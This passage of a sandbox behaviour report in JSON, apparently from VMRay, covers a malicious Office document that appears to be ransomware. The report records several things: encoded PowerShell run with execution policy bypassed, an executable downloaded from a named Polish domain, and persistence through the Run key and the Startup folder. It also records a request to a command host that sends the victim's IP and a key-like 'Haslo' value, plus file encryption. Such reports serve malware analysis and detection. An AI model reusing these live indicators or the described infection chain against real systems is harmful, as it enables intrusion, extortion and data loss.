[ { "ref_id": "gfn_160", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Local\\!PrivacIE!SharedMemory!Mutex\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_340", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\cmd.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_443", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1328", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "91.231.140.161", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1360", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"w-szczecin.pl\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1435", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1507", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\kFT6uTQW\\AppData\\Roaming\\nvss.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_1666", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"C:\\Users\\kFT6uTQW\\AppData\\Roaming\\nvss.exe\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "176.58.123.25", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1838", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"v4.ident.me\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "82.221.129.19", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1844", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"beer-ranking.pl\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1866", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"CMD.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_2149", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_file", "technique_desc": "Add \"c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\" to windows startup folder.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_3606", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\kFT6uTQW\\AppData\\Roaminghhfhqi2h.wln.bat\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_3739", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\taskkill.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\kFT6uTQW\\Documents\\WffPHgzW1qt5nuBKPq.docx", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\documents\\wffphgzw1qt5nubkpq.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_user_files", "operation_desc": "Modify content of user files", "ref_gfncalls": [ { "ref_id": "gfn_5004", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_user_files", "technique_desc": "Modify the content of multiple user files. This is an indicator for an encryption attempt.", "technique_path": "built_in._file_system._modify_user_files.vmray_modify_user_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_create_many_files", "operation_desc": "Create many files", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_many_files", "technique_desc": "Create above average number of files.", "technique_path": "built_in._file_system._create_many_files.vmray_create_many_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_execute_encoded_powershell_script", "operation_desc": "Execute encoded PowerShell script", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_encoded_powershell_script", "technique_desc": "Execute encoded PowerShell script to possibly hide malicious payload.", "technique_path": "built_in._process._execute_encoded_powershell_script.vmray_execute_encoded_powershell_script", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_handle_with_malicious_files", "operation_desc": "Handle with malicious files", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_handle_with_malicious_files", "technique_desc": "File \"c:\\users\\kft6utqw\\appdata\\roaming\\nvss.exe\" is a known malicious file.", "technique_path": "built_in._file_system._handle_with_malicious_files.vmray_handle_with_malicious_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_1363", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"91.231.140.161:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_1841", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"176.58.123.25:443\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_1845", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"82.221.129.19:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"w-szczecin.pl/img2/s50.exe\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"beer-ranking.pl/gen/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"beer-ranking.pl/save.txt\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\kft6utqw\\appdata\\roaming\\nvss.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\kft6utqw\\appdata\\roaming\\nvss.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }